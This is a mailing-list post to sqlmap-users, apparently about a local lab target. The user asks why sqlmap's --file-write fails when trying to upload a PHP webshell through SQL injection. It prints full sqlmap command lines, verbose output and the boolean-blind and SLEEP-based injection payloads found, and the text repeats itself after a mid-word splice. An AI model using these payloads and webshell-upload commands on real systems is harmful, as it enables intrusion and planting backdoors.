[sqlmap-users] File Write Error
Brought to you by:
inquisb
From: Brian O. <br...@hu...> - 2014-03-21 03:44:51
|
Hello Everyone, I'm attempting to use sqlmap to exploit a local installation of some software. I know it's vulnerable because it's on exploit-db & metasploit pops it every time (http://www.exploit-db.com/exploits/20501/). I've had limited success with sqlmap, but I'm at the final stage now where I'm trying to use the sqli's I've found to upload a webshell via sqlmap. No dice....I'm getting an error stating "[ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server." Other than the obvious, I'm not sure what this means because --os-shell and --os-cmd upload a file and execute just fine. Does --file-write need something special? Here's the output: root@kali:/usr/share/sqlmap# sqlmap -u " http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 ... [*] starting at 23:13:08 [23:13:08] [DEBUG] cleaning up configuration parameters [23:13:08] [DEBUG] setting the HTTP timeout [23:13:08] [DEBUG] setting the HTTP method to GET [23:13:08] [DEBUG] creating HTTP requests opener object [23:13:08] [DEBUG] forcing back-end DBMS to user defined value [23:13:08] [DEBUG] setting the write file functionality [23:13:08] [INFO] testing connection to the target URL [23:13:08] [DEBUG] declared web page charset 'utf-8' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) --- [23:13:08] [INFO] testing MySQL [23:13:08] [INFO] confirming MySQL [23:13:08] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL >= 5.0.0 [23:13:08] [INFO] fingerprinting the back-end DBMS operating system [23:13:08] [INFO] the back-end DBMS operating system is Windows [23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server [23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138' [*] shutting down at 23:13:08 The results are the same when the cmdline is changed up for a POST version: root@kali:/usr/share/sqlm Hello Everyone, I'm attempting to use sqlmap to exploit a local installation of some software. I know it's vulnerable because it's on exploit-db & metasploit pops it every time (http://www.exploit-db.com/exploits/20501/). I've had limited success with sqlmap, but I'm at the final stage now where I'm trying to use the sqli's I've found to upload a webshell via sqlmap. No dice....I'm getting an error stating "[ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server." Other than the obvious, I'm not sure what this means because --os-shell and --os-cmd upload a file and execute just fine. Does --file-write need something special? Here's the output: root@kali:/usr/share/sqlmap# sqlmap -u " http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 ... [*] starting at 23:13:08 [23:13:08] [DEBUG] cleaning up configuration parameters [23:13:08] [DEBUG] setting the HTTP timeout [23:13:08] [DEBUG] setting the HTTP method to GET [23:13:08] [DEBUG] creating HTTP requests opener object [23:13:08] [DEBUG] forcing back-end DBMS to user defined value [23:13:08] [DEBUG] setting the write file functionality [23:13:08] [INFO] testing connection to the target URL [23:13:08] [DEBUG] declared web page charset 'utf-8' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) --- [23:13:08] [INFO] testing MySQL [23:13:08] [INFO] confirming MySQL [23:13:08] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL >= 5.0.0 [23:13:08] [INFO] fingerprinting the back-end DBMS operating system [23:13:08] [INFO] the back-end DBMS operating system is Windows [23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server [23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138' [*] shutting down at 23:13:08 The results are the same when the cmdline is changed up for a POST version: root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 Any thoughts on what may be happening here would be much appreciated. Thanks, Brian ap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3 Any thoughts on what may be happening here would be much appreciated. Thanks, Brian |